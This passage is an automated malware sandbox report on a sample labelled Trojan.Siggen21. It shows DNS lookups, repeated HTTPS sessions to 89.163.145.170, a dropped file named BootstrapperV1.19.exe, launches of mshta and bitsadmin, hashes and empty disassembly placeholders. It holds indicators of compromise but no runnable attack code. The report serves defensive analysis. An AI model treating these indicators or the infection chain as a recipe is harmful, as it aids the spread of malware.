Sep 16, 2024 12:22:27.101197004 CEST | 53 | 54109 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:27.934755087 CEST | 57648 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:27.981240034 CEST | 53 | 57648 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:28.006108046 CEST | 60794 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:28.014050961 CEST | 53 | 60794 | 1.1.1.1 | 192.168.2.4 |
Sep 16, 2024 12:22:30.835216045 CEST | 65441 | 53 | 192.168.2.4 | 1.1.1.1 |
Sep 16, 2024 12:22:30.842379093 CEST | 53 | 65441 | 1.1.1.1 | 192.168.2.4 |
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|
Sep 16, 2024 12:22:23.275859118 CEST | 192.168.2.4 | 1.1.1.1 | 0x4411 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:27.094228983 CEST | 192.168.2.4 | 1.1.1.1 | 0x504a | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:27.934755087 CEST | 192.168.2.4 | 1.1.1.1 | 0x4753 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:28.006108046 CEST | 192.168.2.4 | 1.1.1.1 | 0xd4f7 | Standard query (0) | A (IP address) | IN (0x0001) | false | |
Sep 16, 2024 12:22:30.835216045 CEST | 192.168.2.4 | 1.1.1.1 | 0x26e1 | Standard query (0) | A (IP address) | IN (0x0001) | false |
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS |
---|---|---|---|---|---|---|---|---|---|---|
Sep 16, 2024 12:22:23.283305883 CEST | 1.1.1.1 | 192.168.2.4 | 0x4411 | No error (0) | 104.21.93.27 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:23.283305883 CEST | 1.1.1.1 | 192.168.2.4 | 0x4411 | No error (0) | 172.67.203.125 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | 104.20.4.235 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | 172.67.19.24 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.101197004 CEST | 1.1.1.1 | 192.168.2.4 | 0x504a | No error (0) | 104.20.3.235 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:27.981240034 CEST | 1.1.1.1 | 192.168.2.4 | 0x4753 | No error (0) | 89.163.145.170 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | titanium.roblox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | edge-term4.roblox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | edge-term4-lhr2.roblox.com | CNAME (Canonical name) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:28.014050961 CEST | 1.1.1.1 | 192.168.2.4 | 0xd4f7 | No error (0) | 128.116.119.3 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:30.842379093 CEST | 1.1.1.1 | 192.168.2.4 | 0x26e1 | No error (0) | 104.20.23.46 | A (IP address) | IN (0x0001) | false | ||
Sep 16, 2024 12:22:30.842379093 CEST | 1.1.1.1 | 192.168.2.4 | 0x26e1 | No error (0) | 104.20.22.46 | A (IP address) | IN (0x0001) | false |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
0 | 192.168.2.4 | 49731 | 104.21.93.27 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:24 UTC | 63 | OUT | |
2024-09-16 10:22:24 UTC | 577 | IN | |
2024-09-16 10:22:24 UTC | 792 | IN | |
2024-09-16 10:22:24 UTC | 1369 | IN | |
2024-09-16 10:22:24 UTC | 1369 | IN | |
2024-09-16 10:22:24 UTC | 872 | IN | |
2024-09-16 10:22:24 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
1 | 192.168.2.4 | 49734 | 104.21.93.27 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:24 UTC | 151 | OUT | |
2024-09-16 10:22:25 UTC | 831 | IN | |
2024-09-16 10:22:25 UTC | 109 | IN | |
2024-09-16 10:22:25 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
2 | 192.168.2.4 | 49737 | 104.20.4.235 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:27 UTC | 168 | OUT | |
2024-09-16 10:22:27 UTC | 398 | IN | |
2024-09-16 10:22:27 UTC | 562 | IN | |
2024-09-16 10:22:27 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
3 | 192.168.2.4 | 49739 | 128.116.119.3 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:28 UTC | 213 | OUT | |
2024-09-16 10:22:29 UTC | 576 | IN | |
2024-09-16 10:22:29 UTC | 119 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
4 | 192.168.2.4 | 49738 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:28 UTC | 137 | OUT | |
2024-09-16 10:22:28 UTC | 395 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
5 | 192.168.2.4 | 49740 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:30 UTC | 209 | OUT | |
2024-09-16 10:22:30 UTC | 420 | IN | |
2024-09-16 10:22:30 UTC | 1120 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
6 | 192.168.2.4 | 49741 | 104.20.23.46 | 443 | 6516 | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:31 UTC | 193 | OUT | |
2024-09-16 10:22:31 UTC | 497 | IN | |
2024-09-16 10:22:31 UTC | 20 | IN | |
2024-09-16 10:22:31 UTC | 5 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
7 | 192.168.2.4 | 49744 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:35 UTC | 212 | OUT | |
2024-09-16 10:22:35 UTC | 422 | IN | |
2024-09-16 10:22:35 UTC | 204 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
8 | 192.168.2.4 | 49747 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:36 UTC | 212 | OUT | |
2024-09-16 10:22:36 UTC | 422 | IN | |
2024-09-16 10:22:36 UTC | 270 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
9 | 192.168.2.4 | 49751 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:39 UTC | 212 | OUT | |
2024-09-16 10:22:39 UTC | 422 | IN | |
2024-09-16 10:22:39 UTC | 458 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
10 | 192.168.2.4 | 49753 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:41 UTC | 212 | OUT | |
2024-09-16 10:22:41 UTC | 422 | IN | |
2024-09-16 10:22:41 UTC | 132 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
11 | 192.168.2.4 | 49756 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:44 UTC | 212 | OUT | |
2024-09-16 10:22:44 UTC | 422 | IN | |
2024-09-16 10:22:44 UTC | 527 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
12 | 192.168.2.4 | 49759 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:47 UTC | 212 | OUT | |
2024-09-16 10:22:48 UTC | 422 | IN | |
2024-09-16 10:22:48 UTC | 173 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
13 | 192.168.2.4 | 49760 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:50 UTC | 212 | OUT | |
2024-09-16 10:22:50 UTC | 422 | IN | |
2024-09-16 10:22:50 UTC | 589 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
14 | 192.168.2.4 | 49761 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:53 UTC | 212 | OUT | |
2024-09-16 10:22:53 UTC | 422 | IN | |
2024-09-16 10:22:53 UTC | 429 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
15 | 192.168.2.4 | 49762 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:55 UTC | 212 | OUT | |
2024-09-16 10:22:55 UTC | 422 | IN | |
2024-09-16 10:22:55 UTC | 286 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
16 | 192.168.2.4 | 49763 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:57 UTC | 212 | OUT | |
2024-09-16 10:22:57 UTC | 422 | IN | |
2024-09-16 10:22:57 UTC | 199 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
17 | 192.168.2.4 | 49764 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:22:59 UTC | 212 | OUT | |
2024-09-16 10:22:59 UTC | 421 | IN | |
2024-09-16 10:22:59 UTC | 24 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
18 | 192.168.2.4 | 49765 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:03 UTC | 212 | OUT | |
2024-09-16 10:23:03 UTC | 422 | IN | |
2024-09-16 10:23:03 UTC | 348 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
19 | 192.168.2.4 | 49766 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:07 UTC | 212 | OUT | |
2024-09-16 10:23:07 UTC | 422 | IN | |
2024-09-16 10:23:07 UTC | 389 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
20 | 192.168.2.4 | 49767 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:11 UTC | 212 | OUT | |
2024-09-16 10:23:11 UTC | 422 | IN | |
2024-09-16 10:23:11 UTC | 173 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
21 | 192.168.2.4 | 49768 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:14 UTC | 212 | OUT | |
2024-09-16 10:23:14 UTC | 422 | IN | |
2024-09-16 10:23:14 UTC | 154 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
22 | 192.168.2.4 | 49770 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:17 UTC | 212 | OUT | |
2024-09-16 10:23:17 UTC | 421 | IN | |
2024-09-16 10:23:17 UTC | 83 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
23 | 192.168.2.4 | 49771 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:20 UTC | 212 | OUT | |
2024-09-16 10:23:20 UTC | 422 | IN | |
2024-09-16 10:23:20 UTC | 157 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
24 | 192.168.2.4 | 49772 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:23 UTC | 212 | OUT | |
2024-09-16 10:23:23 UTC | 422 | IN | |
2024-09-16 10:23:23 UTC | 283 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
25 | 192.168.2.4 | 49773 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:26 UTC | 212 | OUT | |
2024-09-16 10:23:26 UTC | 421 | IN | |
2024-09-16 10:23:26 UTC | 81 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
26 | 192.168.2.4 | 49774 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:29 UTC | 212 | OUT | |
2024-09-16 10:23:29 UTC | 420 | IN | |
2024-09-16 10:23:29 UTC | 9 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
27 | 192.168.2.4 | 49775 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:33 UTC | 212 | OUT | |
2024-09-16 10:23:33 UTC | 421 | IN | |
2024-09-16 10:23:33 UTC | 81 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
28 | 192.168.2.4 | 49776 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:37 UTC | 212 | OUT | |
2024-09-16 10:23:37 UTC | 421 | IN | |
2024-09-16 10:23:37 UTC | 82 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
29 | 192.168.2.4 | 49777 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:42 UTC | 212 | OUT | |
2024-09-16 10:23:42 UTC | 422 | IN | |
2024-09-16 10:23:42 UTC | 144 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
30 | 192.168.2.4 | 49778 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:46 UTC | 212 | OUT | |
2024-09-16 10:23:46 UTC | 422 | IN | |
2024-09-16 10:23:46 UTC | 229 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
31 | 192.168.2.4 | 49779 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:50 UTC | 212 | OUT | |
2024-09-16 10:23:50 UTC | 421 | IN | |
2024-09-16 10:23:50 UTC | 93 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
32 | 192.168.2.4 | 49780 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:54 UTC | 212 | OUT | |
2024-09-16 10:23:54 UTC | 422 | IN | |
2024-09-16 10:23:54 UTC | 136 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
33 | 192.168.2.4 | 49781 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:23:57 UTC | 212 | OUT | |
2024-09-16 10:23:58 UTC | 421 | IN | |
2024-09-16 10:23:58 UTC | 28 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
34 | 192.168.2.4 | 49782 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:01 UTC | 212 | OUT | |
2024-09-16 10:24:02 UTC | 422 | IN | |
2024-09-16 10:24:02 UTC | 149 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
35 | 192.168.2.4 | 49783 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:06 UTC | 212 | OUT | |
2024-09-16 10:24:06 UTC | 421 | IN | |
2024-09-16 10:24:06 UTC | 93 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
36 | 192.168.2.4 | 49784 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:10 UTC | 212 | OUT | |
2024-09-16 10:24:10 UTC | 422 | IN | |
2024-09-16 10:24:10 UTC | 249 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
37 | 192.168.2.4 | 49785 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:14 UTC | 212 | OUT | |
2024-09-16 10:24:14 UTC | 422 | IN | |
2024-09-16 10:24:14 UTC | 229 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
38 | 192.168.2.4 | 49786 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:19 UTC | 212 | OUT | |
2024-09-16 10:24:19 UTC | 422 | IN | |
2024-09-16 10:24:19 UTC | 180 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process |
---|---|---|---|---|---|---|
39 | 192.168.2.4 | 49787 | 89.163.145.170 | 443 | 2708 | C:\Windows\System32\svchost.exe |
Timestamp | Bytes transferred | Direction | Data |
---|---|---|---|
2024-09-16 10:24:23 UTC | 212 | OUT | |
2024-09-16 10:24:23 UTC | 421 | IN | |
2024-09-16 10:24:23 UTC | 80 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Click to jump to process
Target ID: | 0 |
Start time: | 06:22:19 |
Start date: | 16/09/2024 |
Path: | C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0xb90000 |
File size: | 1'010'176 bytes |
MD5 hash: | 7AFABB528CE69E3A40DEC6C3253EF854 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | low |
Has exited: | true |
Target ID: | 1 |
Start time: | 06:22:20 |
Start date: | 16/09/2024 |
Path: | C:\Windows\SysWOW64\mshta.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x850000 |
File size: | 13'312 bytes |
MD5 hash: | 06B02D5C097C7DB1F109749C45F3F505 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 2 |
Start time: | 06:22:20 |
Start date: | 16/09/2024 |
Path: | C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x226e67e0000 |
File size: | 995'840 bytes |
MD5 hash: | 90FD25CED85FE6DB28D21AE7D1F02E2C |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Yara matches: |
|
Antivirus matches: |
|
Reputation: | low |
Has exited: | true |
Target ID: | 3 |
Start time: | 06:22:20 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Target ID: | 4 |
Start time: | 06:22:21 |
Start date: | 16/09/2024 |
Path: | C:\Windows\SysWOW64\bitsadmin.exe |
Wow64 process (32bit): | true |
Commandline: | |
Imagebase: | 0x910000 |
File size: | 186'880 bytes |
MD5 hash: | F57A03FA0E654B393BB078D1C60695F3 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | moderate |
Has exited: | false |
Target ID: | 5 |
Start time: | 06:22:21 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\conhost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff7699e0000 |
File size: | 862'208 bytes |
MD5 hash: | 0D698AF330FD17BEE3BF90011D49251D |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 6 |
Start time: | 06:22:22 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\svchost.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6eef20000 |
File size: | 55'320 bytes |
MD5 hash: | B7F884C1B74A263F746EE12A5F7C9F6A |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | false |
Target ID: | 12 |
Start time: | 06:22:31 |
Start date: | 16/09/2024 |
Path: | C:\Windows\System32\WerFault.exe |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x7ff6cdd30000 |
File size: | 570'736 bytes |
MD5 hash: | FD27D9F6D02763BDE32511B5DF7FF7A0 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |
Has exited: | true |
Function 00007FFD9B70110D Relevance: .4, Instructions: 414COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B7009F7 Relevance: .2, Instructions: 219COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B700D80 Relevance: .1, Instructions: 109COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B700498 Relevance: .1, Instructions: 90COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B700EF9 Relevance: .1, Instructions: 62COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B700951 Relevance: .1, Instructions: 60COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B700E71 Relevance: .1, Instructions: 53COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B7004B0 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B7004A8 Relevance: .0, Instructions: 45COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B700F3F Relevance: .0, Instructions: 30COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B710DC8 Relevance: .9, Instructions: 946COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B71C864 Relevance: .6, Instructions: 614COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Function 00007FFD9B710E88 Relevance: .5, Instructions: 473COMMON
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
|
Strings |
|
Memory Dump Source |
|
Joe Sandbox IDA Plugin |
|
Similarity |
